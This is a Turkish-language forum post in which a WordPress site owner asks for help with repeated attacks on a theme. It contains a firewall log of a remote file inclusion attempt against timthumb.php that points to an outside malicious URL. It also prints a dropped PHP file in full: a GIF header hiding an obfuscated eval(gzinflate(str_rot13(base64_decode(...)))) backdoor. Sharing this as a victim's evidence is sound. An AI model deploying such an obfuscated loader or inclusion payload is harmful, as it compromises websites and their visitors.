- Katılım
- 21 Ocak 2013
- Mesajlar
- 26
- Reaction score
- 0
Arkadaşlar merhaba, çeşitli ddos saldırıları alıyorum. Yaşadığım sorunla bağlantısı var mı bilmiyorum fakat, saldırı logları şu şekilde :
Şu an buna benzer saldırılar alıyorum ve ip adreslerini tek tek bloklamaya çalışıyorum. Fakat ben sıfırdan kurulum yaptım ve yukarıda ki bağlantıda gösteririlen, "wp-content/themes/Aggregate/timthumb.php" dizini ve dosyası mevcut değil, ama hala bu kaynağa saldırı yapıldığını gösteriyor firewall uygulamam.
ikinci olarakta, söz konusu temanın klasör ismini değiştirerek yeniden aktif eder etmez, temaya ait "cache" klasöründe random php dosyaları oluşuyor ve bu dosyalar çoğu zaman virüslü oluyor. Son denememde tema sadece 15 dakika aktif kalmasına rağmen hemen php dosyası oluştu, dosya adı ve içeriği şu şekilde:
Bazen de temanın js klasörüne "uu" adıyla trojenli dosya koyuyorlar. Bu tema var ez, ayrıca temayı aktif ettikten beş dakika sonra site ciddi bir şekilde kasmaya başlıyor bu bilgilere rağmen bir sebep bulamadım, neden böyle oluyor acaba ?
Kod:
== Attack Details ==
TYPE: Found Basic Remote File Inclusion
DETECTED ATTACK VALUE: flickr. xxxx. alba-sport.net/bad.php (Tıklamayın virüslü bağlantı!)
ACTION: Blocked
LOGTIME: 2013-01-28 10:57:30
FROM IP: whois domaintools com / 5.152.194.133
URI: yasamaugrasi xxx / wp-content /themes/Aggregate/timthumb.php
METHOD: GET
USERAGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
REFERRER: N/AŞu an buna benzer saldırılar alıyorum ve ip adreslerini tek tek bloklamaya çalışıyorum. Fakat ben sıfırdan kurulum yaptım ve yukarıda ki bağlantıda gösteririlen, "wp-content/themes/Aggregate/timthumb.php" dizini ve dosyası mevcut değil, ama hala bu kaynağa saldırı yapıldığını gösteriyor firewall uygulamam.
ikinci olarakta, söz konusu temanın klasör ismini değiştirerek yeniden aktif eder etmez, temaya ait "cache" klasöründe random php dosyaları oluşuyor ve bu dosyalar çoğu zaman virüslü oluyor. Son denememde tema sadece 15 dakika aktif kalmasına rağmen hemen php dosyası oluştu, dosya adı ve içeriği şu şekilde:
PHP:
GIF89a???????????!??????,???????D?;?<?
set_time_limit(0);
error_reporting(0);
$rhs = '1ZfNYYJAFFP3Jr4DO7QJ4H9ZWlk3WpfdZ2LoYxEahCkzFKzx3VsbKCOQiWDNne7EMM7BzPm+i+8O3CQk3I/CDXE+43mgUAZRHw4P/d7D6eNAQrfANY9mbWJM74n/Vm9VzRC4UiEOzDe61Yx0zR4vJmbXni0X89FrDqPZZepBpkbyV3Nwx2Qmp/tJpwUX3akPSr/bk+R7kXz76IbbByk1nCgNg8hpNMOWk9wQcB9zmsGiJCYgdEvfkMIFQbxY/2Ipc7f9nx5fpL+6vt2jxzvNiN32p9fRLL6jK3mJZQxxmQoMUqT6xURProIGW7KCA182P2cgM6lUzbsmwI5XXnZli+Xn2O0XHvs9CBj4DS3NPAiCjdDV5ReIjS1PoFKNCIEbNGmVBjl0URa8lBEpQzJTBHUdBnRUHLvcm2CU8EGZomKERVVQ/NJiok7XskW2tU5AZS9vDmcYDToyXDAg7BmHXTEc/FxgDgY5AF445QD4gUeAYIdDzoEYPDkBQdjkm7f3vjjJ6N1fAU5KWJ3OrwIpopoCXV8h+b/qfdixfECoPOnVnrcvdHY9Rpsx7sVWXtDFJW9Slwh1VkUioHSIgIKcHiUJXmGUDCiJRGHfTXDhR3AXaR1SAdGUKe0GJHLEwy/uOosaItZt90JH7fwifDh+AQ==';
eval(gzinflate(str_rot13(base64_decode($rhs))));
?>Bazen de temanın js klasörüne "uu" adıyla trojenli dosya koyuyorlar. Bu tema var ez, ayrıca temayı aktif ettikten beş dakika sonra site ciddi bir şekilde kasmaya başlıyor bu bilgilere rağmen bir sebep bulamadım, neden böyle oluyor acaba ?